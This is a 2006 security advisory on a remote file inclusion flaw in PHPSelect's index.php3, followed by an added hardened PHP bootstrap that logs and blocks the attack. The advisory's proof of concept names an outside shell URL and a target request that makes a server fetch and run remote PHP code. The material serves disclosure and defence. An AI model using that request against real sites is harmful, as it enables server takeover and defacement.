PHPSelect.txt

04 Oct 2006 00:00:00 | Reported by rUnViRuS | Type: packetstorm | Source: packetstormsecurity.com

PHPSelect Web Development Division Remote File Inclusion vulnerability found, risk high

`+--------------------------------------------------------------------  
+  
+ PHPSelect Web Development Division :) <= Remote File Inclusion  
+  
+--------------------------------------------------------------------  
+  
+ Affected Software .: PHPSelect Web Development Division  
+ Vendor ............: http://www.phpselect.com/   
+ Class .............: Remote File Inclusion  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: rUnViRuS  
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/   
+ Contact ...........: stormhacker[at]hotmail[.]com  
+  
+--------------------------------------------------------------------  
+  
+ Code index.php3:  
+  
+ .....  
+ include("$Application_Root/modules/include/global_settings");  
+ .....  
+  
+--------------------------------------------------------------------  
+  
+ $Application_Root is not properly sanitized before being used.  
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.  
+  
+--------------------------------------------------------------------  
+  
+ Solution:  
+ Add this line to your php-file:  
+  
+ $Application_Root = "user/dir"; // Your root path  
+  
+--------------------------------------------------------------------  
+ PoC:  
+ Place a PHPShell on a remote location:  
+ http://wdzone.net/sh.txt?  
+  
+  
+ http://[target]/index.php3?Application_Root=http://phpshell  
+  
+--------------------------------------------------------------------  
+ [W]orld [D]efacers [T]eam  
+ Greets:  
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||  
+ || Pro Hacker ||  
+  
+-------------------------[ W D T ]----------------------------------  
`
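
The fix described in the advisory, extended into a hardened bootstrap for the top of `index.php3`. This is an added example, not code from the original advisory or from PHPSelect. The constant `APPLICATION_ROOT` and the helper `safe_include_path()` are hypothetical names, and the code assumes PHP 7 or later with the application living in the directory that contains `index.php3`.

```php
<?php
// Added example (not PHPSelect code): hardened bootstrap for index.php3.
// Server-side settings that close this bug class (php.ini):
//   register_globals = Off   (directive removed entirely in PHP 5.4)
//   allow_url_include = Off  (blocks include() of http:// and ftp:// URLs)

// 1. Fix the root on the server so no request variable can supply it.
//    Assumption: the application root is the directory of this file.
define('APPLICATION_ROOT', realpath(__DIR__));

// 2. Reject and log any request that tries to set Application_Root.
//    The log line gives defenders a detection signal for probing.
if (isset($_GET['Application_Root'])
    || isset($_POST['Application_Root'])
    || isset($_COOKIE['Application_Root'])) {
    error_log('Blocked Application_Root override from '
        . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(400);
    exit('Bad request');
}

// 3. Resolve every include path and require it to stay under the root.
//    realpath() returns false for URLs and missing files, so a remote
//    location or a ../ traversal can never pass this check.
function safe_include_path(string $root, string $relative): string
{
    $path   = realpath($root . DIRECTORY_SEPARATOR . $relative);
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("Include outside application root: $relative");
    }
    return $path;
}

// Replaces: include("$Application_Root/modules/include/global_settings");
include safe_include_path(APPLICATION_ROOT, 'modules/include/global_settings');
```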
